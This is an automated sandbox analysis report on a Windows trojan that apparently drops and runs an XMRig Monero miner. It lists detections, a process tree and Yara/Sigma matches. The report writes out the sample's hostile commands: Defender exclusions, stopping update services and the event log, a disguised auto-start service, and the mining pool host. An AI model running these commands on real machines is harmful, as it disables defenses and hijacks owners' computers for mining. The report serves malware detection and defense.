Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TwrhjEKqxk.exe

Overview

General Information

Sample name:TwrhjEKqxk.exe
renamed because original name is a hash value
Original sample name:dbf8d8ef015846d4078466a7c1d3f41c.exe
Analysis ID:1527556
MD5:dbf8d8ef015846d4078466a7c1d3f41c
SHA1:67d156457e6028addc00cdd3a2e595d7c7a00466
SHA256:d50ecb2fa3afee2d23f9f952201e01898e191e9d475f44bc1c146c49c4efe4bb
Tags:64exetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TwrhjEKqxk.exe (PID: 4748 cmdline: "C:\Users\user\Desktop\TwrhjEKqxk.exe" MD5: DBF8D8EF015846D4078466A7C1D3F41C)
    • powershell.exe (PID: 4404 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2516 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 2200 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 1088 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5804 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5560 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1576 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3652 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6448 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5908 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6304 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 432 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2436 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2200 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1276 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5804 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 3620 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: DBF8D8EF015846D4078466A7C1D3F41C)
    • powershell.exe (PID: 3168 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6416 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6516 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 432 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6184 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6348 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1276 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2136 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4124 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6448 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5356 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4752 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 6476 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 6448 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000003B.00000003.2189751609.0000000001118000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000003B.00000003.2189751609.0000000001109000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000003B.00000002.4507671698.0000000001118000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            34.3.updater.exe.2166ee40000.2.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              34.3.updater.exe.2166ee40000.2.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x36fe08:$a1: mining.set_target
              • 0x362030:$a2: XMRIG_HOSTNAME
              • 0x3649a8:$a3: Usage: xmrig [OPTIONS]
              • 0x362008:$a4: XMRIG_VERSION
              34.3.updater.exe.2166ee40000.2.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
              • 0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
              34.3.updater.exe.2166ee40000.2.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
              • 0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu
              • 0x3b9400:$s3: \\.\WinRing0_
              • 0x366fa8:$s4: pool_wallet
              • 0x3613d8:$s5: cryptonight
              • 0x3613e8:$s5: cryptonight
              • 0x3613f8:$s5: cryptonight
              • 0x361408:$s5: cryptonight
              • 0x361420:$s5: cryptonight
              • 0x361430:$s5: cryptonight
              • 0x361440:$s5: cryptonight
              • 0x361458:$s5: cryptonight
              • 0x361468:$s5: cryptonight
              • 0x361480:$s5: cryptonight
              • 0x361498:$s5: cryptonight
              • 0x3614a8:$s5: cryptonight
              • 0x3614b8:$s5: cryptonight
              • 0x3614c8:$s5: cryptonight
              • 0x3614e0:$s5: cryptonight
              • 0x3614f8:$s5: cryptonight
              • 0x361508:$s5: cryptonight
              • 0x361518:$s5: cryptonight
              34.3.updater.exe.2166ee40000.2.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 3 entries

                Sigma Signatures

                Change of critical system settings

                barindex
                Sigma detected: Disable power options
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6448, ProcessName: powercfg.exe

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 4404, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 4404, ProcessName: powershell.exe
                Sigma detected: New Service Creation Using Sc.EXE
                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 2200, ProcessName: sc.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 4404, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 6448, ProcessName: svchost.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Stop EventLog
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\TwrhjEKqxk.exe", ParentImage: C:\Users\user\Desktop\TwrhjEKqxk.exe, ParentProcessId: 4748, ParentProcessName: TwrhjEKqxk.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 1276, ProcessName: sc.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: TwrhjEKqxk.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\ProgramData\Google\Chrome\updater.exeAvira: detection malicious, Label: HEUR/AGEN.1362845
                Multi AV Scanner detection for domain / URL
                Source: xmr-eu1.nanopool.orgVirustotal: Detection: 5%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 55%
                Source: C:\ProgramData\Google\Chrome\updater.exeVirustotal: Detection: 45%Perma Link
                Multi AV Scanner detection for submitted file
                Source: TwrhjEKqxk.exeReversingLabs: Detection: 55%
                Source: TwrhjEKqxk.exeVirustotal: Detection: 45%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                Bitcoin Miner

                barindex
                Yara detected Xmrig cryptocurrency miner
                Source: Yara matchFile source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000003B.00000003.2189751609.0000000001118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000003.2189751609.0000000001109000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.4507671698.0000000001118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000003.3457810885.0000000001118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.4507448971.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: updater.exe PID: 3620, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6476, type: MEMORYSTR
                DNS related to crypt mining pools
                Source: unknownDNS query: name: xmr-eu1.nanopool.org
                Found strings related to Crypto-Mining
                Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: TwrhjEKqxk.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: TwrhjEKqxk.exe, 00000000.00000002.2150017772.00007FF7A0107000.00000040.00000001.01000000.00000003.sdmp, updater.exe, 00000022.00000002.2192775271.00007FF7DA2D7000.00000040.00000001.01000000.00000004.sdmp
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.dr
                Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: TwrhjEKqxk.exe, 00000000.00000002.2150017772.00007FF7A0107000.00000040.00000001.01000000.00000003.sdmp, updater.exe, 00000022.00000002.2192775271.00007FF7DA2D7000.00000040.00000001.01000000.00000004.sdmp

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 162.19.224.121 10343Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 162.19.224.121:10343
                Source: Joe Sandbox ViewASN Name: CENTURYLINK-US-LEGACY-QWESTUS CENTURYLINK-US-LEGACY-QWESTUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: explorer.exe, 0000003B.00000003.3457810885.000000000111B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000111B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
                Source: explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000112D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
                Source: explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crln
